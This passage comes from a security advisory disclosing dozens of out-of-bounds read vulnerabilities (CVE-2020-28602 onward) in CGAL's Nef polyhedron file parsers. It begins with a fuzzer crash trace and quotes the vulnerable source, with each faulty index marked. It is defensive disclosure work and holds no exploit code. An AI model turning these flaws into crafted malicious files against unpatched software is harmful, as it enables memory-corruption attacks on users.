std::allocator<CGAL::SNC_in_place_list_shalfedge<CGAL::SNC_indexed_items::SHalfedge<CGAL::SNC_structure<CGAL::Cartesian<CGAL::Gmpq>, CGAL::SNC_indexed_items, bool> > > > >) /usr/local/include/CGAL/Nef_3/SNC_io_parser.h:1787:16\n #3 0x7f6ed01ea16c in void CGAL::SNC_io_parser<CGAL::SNC_structure<CGAL::Cartesian<CGAL::Gmpq>, CGAL::SNC_indexed_items, bool> >::read_items<CGAL::Cartesian<CGAL::Gmpq> >(int) /usr/local/include/CGAL/Nef_3/SNC_io_parser.h:1469:10\n #4 0x7f6ed01e7e60 in CGAL::SNC_io_parser<CGAL::SNC_structure<CGAL::Cartesian<CGAL::Gmpq>, CGAL::SNC_indexed_items, bool> >::read() /usr/local/include/CGAL/Nef_3/SNC_io_parser.h:1437:5\n #5 0x7f6ed01e2c91 in std::istream& CGAL::operator>><CGAL::Cartesian<CGAL::Gmpq>, CGAL::SNC_indexed_items, bool>(std::istream&, CGAL::Nef_polyhedron_3<CGAL::Cartesian<CGAL::Gmpq>, CGAL::SNC_indexed_items, bool>&) /usr/local/include/CGAL/IO/Nef_polyhedron_iostream_3.h:44:5\n #6 0x7f6ed01e22cc in import_nef3(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, Location const&) //boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/openscad-openscad-2020.12-RC2/src/import_nef.cc:29:5\n #7 0x5648cc in LLVMFuzzerTestOneInput //boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/./fuzz_nef3_harness.cpp:71:21\n #8 0x46a631 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (//boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/nef3_fuzzdir/nef3_harness.bin+0x46a631)\n #9 0x455da2 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (//boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/nef3_fuzzdir/nef3_harness.bin+0x455da2)\n #10 0x45b856 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (//boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/nef3_fuzzdir/nef3_harness.bin+0x45b856)\n #11 0x484512 in main (//boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/nef3_fuzzdir/nef3_harness.bin+0x484512)\n #12 0x7f6eccd670b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16\n #13 0x43046d in _start (//boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/nef3_fuzzdir/nef3_harness.bin+0x43046d)\n \n AddressSanitizer can not provide additional info.\n SUMMARY: AddressSanitizer: SEGV /build/glibc-ZN95T4/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:312 \n ==3292887==ABORTING\n \n\n#### CVE-2020-28602 - Nef_2/PM_io_parser.h PM_io_parser::read_vertex() Halfedge_of[] OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_vertex() Halfedge_of[]:\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_vertex(Vertex_handle v)\n {\n // precondition: nodes exist\n // syntax: index { mark, point, isolated object }\n int n; bool iso; int f; Mark m; Point p;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> iso) ||\n !(in >> f) ||\n !check_sep(\",\") ||\n !(in >> m) ||\n !check_sep(\",\") ||\n !(in >> p) ||\n !check_sep(\"}\") ) return false;\n \n if (iso) v->set_face(Face_of[f]); \n else v->set_halfedge(Halfedge_of[f]); // <--- oob read into `Halfedge_of`\n \n\n#### CVE-2020-28603 - Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_prev() OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_prev():\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_hedge(Halfedge_handle e)\n { // syntax: index { opposite, prev, next, vertex, face, mark }\n int n, eo, epr, ene, v, f; bool m;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> eo) || !check_sep(\",\") ||\n !(in >> epr) || !check_sep(\",\") ||\n !(in >> ene) || !check_sep(\",\") ||\n !(in >> v) || !check_sep(\",\") ||\n !(in >> f) || !check_sep(\",\") ||\n !(in >> m) || !check_sep(\"}\") )\n return false;\n CGAL_assertion_msg\n (eo >= 0 || (std::size_t) eo < en || epr >= 0 || (std::size_t) epr < en || ene >= 0 || (std::size_t) ene < en ||\n v >= 0 || (std::size_t) v < vn || f >= 0 || (std::size_t) f < fn ,\n \"wrong index in read_hedge\"); // assertion does not stop oobs since it's or'ed\n \n // precond: objects exist!\n CGAL_assertion(EI[e->opposite()]);\n e->set_prev(Halfedge_of[epr]); // <- oob read\n \n\n#### CVE-2020-28604 - Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_next() OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_next():\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_hedge(Halfedge_handle e)\n { // syntax: index { opposite, prev, next, vertex, face, mark }\n int n, eo, epr, ene, v, f; bool m;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> eo) || !check_sep(\",\") ||\n !(in >> epr) || !check_sep(\",\") ||\n !(in >> ene) || !check_sep(\",\") ||\n !(in >> v) || !check_sep(\",\") ||\n !(in >> f) || !check_sep(\",\") ||\n !(in >> m) || !check_sep(\"}\") )\n return false;\n CGAL_assertion_msg\n (eo >= 0 || (std::size_t) eo < en || epr >= 0 || (std::size_t) epr < en || ene >= 0 || (std::size_t) ene < en ||\n v >= 0 || (std::size_t) v < vn || f >= 0 || (std::size_t) f < fn ,\n \"wrong index in read_hedge\"); // assertion does not stop oobs since it's or'ed\n \n // precond: objects exist!\n CGAL_assertion(EI[e->opposite()]);\n e->set_prev(Halfedge_of[epr]); \n e->set_next(Halfedge_of[ene]); // <- oob read\n \n\n#### CVE-2020-28605 - Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_vertex() OOB read\n\nAn oob read exists in Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_vertex():\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_hedge(Halfedge_handle e)\n { // syntax: index { opposite, prev, next, vertex, face, mark }\n int n, eo, epr, ene, v, f; bool m;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> eo) || !check_sep(\",\") ||\n !(in >> epr) || !check_sep(\",\") ||\n !(in >> ene) || !check_sep(\",\") ||\n !(in >> v) || !check_sep(\",\") ||\n !(in >> f) || !check_sep(\",\") ||\n !(in >> m) || !check_sep(\"}\") )\n return false;\n CGAL_assertion_msg\n (eo >= 0 || (std::size_t) eo < en || epr >= 0 || (std::size_t) epr < en || ene >= 0 || (std::size_t) ene < en ||\n v >= 0 || (std::size_t) v < vn || f >= 0 || (std::size_t) f < fn ,\n \"wrong index in read_hedge\"); // assertion does not stop oobs since it's or'ed\n \n // precond: objects exist!\n CGAL_assertion(EI[e->opposite()]);\n e->set_prev(Halfedge_of[epr]); \n e->set_next(Halfedge_of[ene]); \n e->set_vertex(Vertex_of[v]); // <- oob read\n \n\n#### CVE-2020-28606 - Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_face() OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_hedge() e->set_face():\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_hedge(Halfedge_handle e)\n { // syntax: index { opposite, prev, next, vertex, face, mark }\n int n, eo, epr, ene, v, f; bool m;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> eo) || !check_sep(\",\") ||\n !(in >> epr) || !check_sep(\",\") ||\n !(in >> ene) || !check_sep(\",\") ||\n !(in >> v) || !check_sep(\",\") ||\n !(in >> f) || !check_sep(\",\") ||\n !(in >> m) || !check_sep(\"}\") )\n return false;\n CGAL_assertion_msg\n (eo >= 0 || (std::size_t) eo < en || epr >= 0 || (std::size_t) epr < en || ene >= 0 || (std::size_t) ene < en ||\n v >= 0 || (std::size_t) v < vn || f >= 0 || (std::size_t) f < fn ,\n \"wrong index in read_hedge\"); // assertion does not stop oobs since it's or'ed\n \n // precond: objects exist!\n CGAL_assertion(EI[e->opposite()]);\n e->set_prev(Halfedge_of[epr]); \n e->set_next(Halfedge_of[ene]); \n e->set_vertex(Vertex_of[v]); \n e->set_face(Face_of[f]); // <- oob read\n \n\n#### CVE-2020-28607 - Nef_2/PM_io_parser.h PM_io_parser::read_face() set_halfedge() OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_face() set_halfedge():\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_face(Face_handle f)\n { // syntax: index { halfedge, fclist, ivlist, mark }\n int n, ei, vi; Mark m;\n if ( !(in >> n) || !check_sep(\"{\") ) return false;\n if ( !(in >> ei) || !check_sep(\",\") ) return false;\n if (ei >= 0) f->set_halfedge(Halfedge_of[ei]); // <- oob read\n \n\n#### CVE-2020-28608 - Nef_2/PM_io_parser.h PM_io_parser::read_face() store_fc() OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_face() store_fc():\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_face(Face_handle f)\n { // syntax: index { halfedge, fclist, ivlist, mark }\n int n, ei, vi; Mark m;\n if ( !(in >> n) || !check_sep(\"{\") ) return false;\n if ( !(in >> ei) || !check_sep(\",\") ) return false;\n if (ei >= 0) f->set_halfedge(Halfedge_of[ei]); \n while (in >> ei) {\n CGAL_assertion_msg(ei >= 0 && (std::size_t) ei < en, \"wrong index in face cycle list.\");\n f->store_fc(Halfedge_of[ei]); // <- oob read\n } in.clear();\n \n\n#### CVE-2020-28609 - Nef_2/PM_io_parser.h PM_io_parser::read_face() store_iv() OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_face() store_iv():\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_face(Face_handle f)\n { // syntax: index { halfedge, fclist, ivlist, mark }\n int n, ei, vi; Mark m;\n if ( !(in >> n) || !check_sep(\"{\") ) return false;\n if ( !(in >> ei) || !check_sep(\",\") ) return false;\n if (ei >= 0) f->set_halfedge(Halfedge_of[ei]); \n while (in >> ei) {\n CGAL_assertion_msg(ei >= 0 && (std::size_t) ei < en, \"wrong index in face cycle list.\");\n f->store_fc(Halfedge_of[ei]); \n } in.clear();\n if (!check_sep(\",\")) { return false; }\n while (in >> vi) {\n CGAL_assertion_msg(vi >= 0 && (std::size_t) vi < vn, \"wrong index in iso vertex list.\");\n f->store_iv(Vertex_of[vi]); \n } in.clear();\n if (!check_sep(\",\") || !(in >> m) || !check_sep(\"}\") )\n return false;\n mark(f) = m; // <- oob read\n return true;\n }\n \n\n#### CVE-2020-28610 - Nef_S2/SM_io_parser.h SM_io_parser::read_vertex() set_face() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SM_io_parser.h SM_io_parser::read_vertex() set_face():\n \n \n template <typename Decorator_>\n bool SM_io_parser<Decorator_>::read_vertex(SVertex_handle v)\n {\n // precondition: nodes exist\n // syntax: index { isolated incident_object, mark, point}\n int n; bool iso; int f; Mark m; Sphere_point p;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> iso) ||\n !(in >> f) ||\n !check_sep(\",\") ||\n !(in >> m) ||\n !check_sep(\",\") ||\n !(in >> p) ||\n !check_sep(\"}\") ) return false;\n \n if (iso) set_face(v,SFace_of[f]); // <- oob read\n else set_first_out_edge(v,Edge_of[f]);\n v->mark() = m; v->point() = p;\n return true;\n }\n \n\n#### CVE-2020-28611 - Nef_S2/SM_io_parser.h SM_io_parser::read_vertex() set_first_out_edge() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SM_io_parser.h SM_io_parser::read_vertex() set_first_out_edge():\n \n \n template <typename Decorator_>\n bool SM_io_parser<Decorator_>::read_vertex(SVertex_handle v)\n {\n // precondition: nodes exist\n // syntax: index { isolated incident_object, mark, point}\n int n; bool iso; int f; Mark m; Sphere_point p;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> iso) ||\n !(in >> f) ||\n !check_sep(\",\") ||\n !(in >> m) ||\n !check_sep(\",\") ||\n !(in >> p) ||\n !check_sep(\"}\") ) return false;\n \n if (iso) set_face(v,SFace_of[f]);\n else set_first_out_edge(v,Edge_of[f]); // <- oob read\n v->mark() = m; v->point() = p;\n return true;\n }\n \n\n#### CVE-2020-28612 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->svertices_begin() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->svertices_begin():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx, hy, hz, hw;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n vh->sncp() = this->sncp();\n \n in >> index;\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end()); // <- oob read here\n \n\n#### CVE-2020-28613 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->svertices_last() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->svertices_last():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx, hy, hz, hw;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n vh->sncp() = this->sncp();\n \n in >> index;\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end()); \n in >> index;\n vh->svertices_last() = index >= 0 ? Edge_of[index] : this->svertices_end(); // <- oob read here\n \n\n#### CVE-2020-28614 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->shalfedges_begin() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->shalfedges_begin():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx, hy, hz, hw;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n vh->sncp() = this->sncp();\n \n in >> index;\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end());\n in >> index;\n vh->svertices_last() = index >= 0 ? Edge_of[index] : this->svertices_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfedges_begin() = index >= 0 ? SEdge_of[index] : this->shalfedges_end(); // <- oob read here\n \n\n#### CVE-2020-28615 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->shalfedges_last() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->shalfedges_last():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx, hy, hz, hw;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n vh->sncp() = this->sncp();\n \n in >> index;\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end());\n in >> index;\n vh->svertices_last() = index >= 0 ? Edge_of[index] : this->svertices_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfedges_begin() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n in >> index;\n vh->shalfedges_last() = index >= 0 ? SEdge_of[index] : this->shalfedges_end(); // <- oob read here\n \n\n#### CVE-2020-28616 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->sfaces_begin() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->sfaces_begin():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx, hy, hz, hw;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n vh->sncp() = this->sncp();\n \n in >> index;\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end());\n in >> index;\n vh->svertices_last() = index >= 0 ? Edge_of[index] : this->svertices_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfedges_begin() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n in >> index;\n vh->shalfedges_last() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->sfaces_begin() = index >= 0 ? SFace_of[index] : this->sfaces_end(); // <- oob read here\n \n\n#### CVE-2020-28617 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->sfaces_last() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->sfaces_last():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx, hy, hz, hw;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n vh->sncp() = this->sncp();\n \n in >> index;\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end());\n in >> index;\n vh->svertices_last() = index >= 0 ? Edge_of[index] : this->svertices_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfedges_begin() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n in >> index;\n vh->shalfedges_last() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->sfaces_begin() = index >= 0 ? SFace_of[index] : this->sfaces_end();\n in >> index;\n vh->sfaces_last() = index >= 0 ? SFace_of[index] : this->sfaces_end(); // <- oob read here\n \n\n#### CVE-2020-28618 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->shalfloop() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_vertex() vh->shalfloop():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx, hy, hz, hw;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n vh->sncp() = this->sncp();\n \n in >> index;\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end());\n in >> index;\n vh->svertices_last() = index >= 0 ? Edge_of[index] : this->svertices_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfedges_begin() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n in >> index;\n vh->shalfedges_last() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->sfaces_begin() = index >= 0 ? SFace_of[index] : this->sfaces_end();\n in >> index;\n vh->sfaces_last() = index >= 0 ? SFace_of[index] : this->sfaces_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfloop() = index >= 0 ? SLoop_of[index] : this->shalfloops_end(); // <- oob read here\n \n\n#### CVE-2020-28619 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->twin() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->twin():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_edge(Halfedge_handle eh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx,hy,hz,hw;\n #endif\n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n eh->twin() = Edge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28620 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->center_vertex() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->center_vertex():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_edge(Halfedge_handle eh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx,hy,hz,hw;\n #endif\n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n eh->twin() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n eh->center_vertex() = Vertex_of[index]; // <- oob read here\n \n\n#### CVE-2020-28621 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->out_sedge() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->out_sedge():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_edge(Halfedge_handle eh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx,hy,hz,hw;\n #endif\n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n eh->twin() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n eh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n if(index == 0) {\n in >> index;\n eh->out_sedge() = SEdge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28622 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->incident_sface() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_edge() eh->incident_sface():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_edge(Halfedge_handle eh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx,hy,hz,hw;\n #endif\n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n eh->twin() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n eh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n if(index == 0) {\n in >> index;\n eh->out_sedge() = SEdge_of[index];\n } else {\n in >> index;\n eh->incident_sface() = SFace_of[index]; // <- oob read here\n }\n \n\n#### CVE-2020-28623 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->twin() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->twin():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_facet(Halffacet_handle fh) {\n \n bool OK = true;\n int index;\n char cc;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n fh->twin() = Halffacet_of[index]; // <- oob read here\n \n\n#### CVE-2020-28624 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->boundary_entry_objects SEdge_of OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->boundary_entry_objects SEdge_of:\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_facet(Halffacet_handle fh) {\n \n bool OK = true;\n int index;\n char cc;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n fh->twin() = Halffacet_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n fh->boundary_entry_objects().push_back(make_object(SEdge_of[index])); // <- oob read here\n in >> cc;\n }\n \n\n#### CVE-2020-28625 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->boundary_entry_objects SLoop_of OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->boundary_entry_objects SLoop_of:\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_facet(Halffacet_handle fh) {\n \n bool OK = true;\n int index;\n char cc;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n fh->twin() = Halffacet_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n fh->boundary_entry_objects().push_back(make_object(SEdge_of[index]));\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n fh->boundary_entry_objects().push_back(make_object(SLoop_of[index])); // <- oob read here\n in >> cc;\n }\n \n\n#### CVE-2020-28626 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->incident_volume() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_facet() fh->incident_volume():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_facet(Halffacet_handle fh) {\n \n bool OK = true;\n int index;\n char cc;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n fh->twin() = Halffacet_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n fh->boundary_entry_objects().push_back(make_object(SEdge_of[index]));\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n fh->boundary_entry_objects().push_back(make_object(SLoop_of[index]));\n in >> cc;\n }\n \n in >> index;\n fh->incident_volume() = Volume_of[index+addInfiBox]; // <- oob read\n \n\n#### CVE-2020-28627 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_volume() ch->shell_entry_objects() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_volume() ch->shell_entry_objects():\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_volume(Volume_handle ch) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n ch->shell_entry_objects().push_back(make_object(SFace_of[index])); // oob read here\n in >> cc;\n }\n \n\n#### CVE-2020-28628 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_volume() seh->twin() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_volume() seh->twin():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n seh->twin() = SEdge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28629 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->sprev() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->sprev():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n seh->twin() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->sprev() = SEdge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28630 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->snext() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->snext():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n seh->twin() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->sprev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->snext() = SEdge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28631 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->source() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->source():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> 